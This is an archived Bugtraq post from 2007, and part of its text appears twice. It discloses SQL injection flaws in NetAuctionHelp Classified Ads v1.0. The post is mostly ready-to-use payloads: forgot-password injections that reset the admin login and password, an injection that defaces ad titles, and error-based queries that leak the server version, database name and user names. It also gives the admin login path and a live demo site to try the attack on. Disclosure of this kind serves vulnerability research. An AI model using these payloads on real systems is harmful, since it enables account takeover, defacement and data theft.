Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
NetAuctionHelp Classified Ads v1.0 SQL Injection
Nov 24 2007 10:11PM
no-reply Aria-Security net
Aria-Security Team
http://Aria-Security.Net
------------------------------------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111
Try it online @ http://ads.netauctionhelp.com
needed tables:
tblMember.id
tblMember.login
tblMember.pswd
Vulnarable Page: Login.asp
Run this query for Forget Password
-1' UPDATE tblMember Set login= 'admin' where(id='1');--
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--
there it is, admin with the password hacked
------------------------------------------------------------------------
------------
these may help the attacker to get more info in the search.asp page
/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]
tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'
example: -1' update tblAd set title= 'hacked' where(id='1');--
site.com/addetl.asp?id=1 will say HACKED.
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--
hint: /auctionAdmin/admLogin.asp ;)
Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
http://Aria-Security.Net
------------------------------------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111
Try it online @ http://ads.netauctionhelp.com
needed tables:
tblMember.id
tblMember.login
tblMember.pswd
Vulnarable Page: Login.asp
Run this query for Forget Password
-1' UPDATE tblMember Set login= 'admin' where(id='1');--
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--
there it is, admin with the password hacked
------------------------------------------------------------------------
------------
these may help the attacker to get more info in the search.asp page
/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]
tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'
example: -1' update tblAd set title= 'hacked' where(id='1');--
site.com/addetl.asp?id=1 will say HACKED.
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--
hint: /auctionAdmin/admLogin.asp ;)
Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w
[ reply ]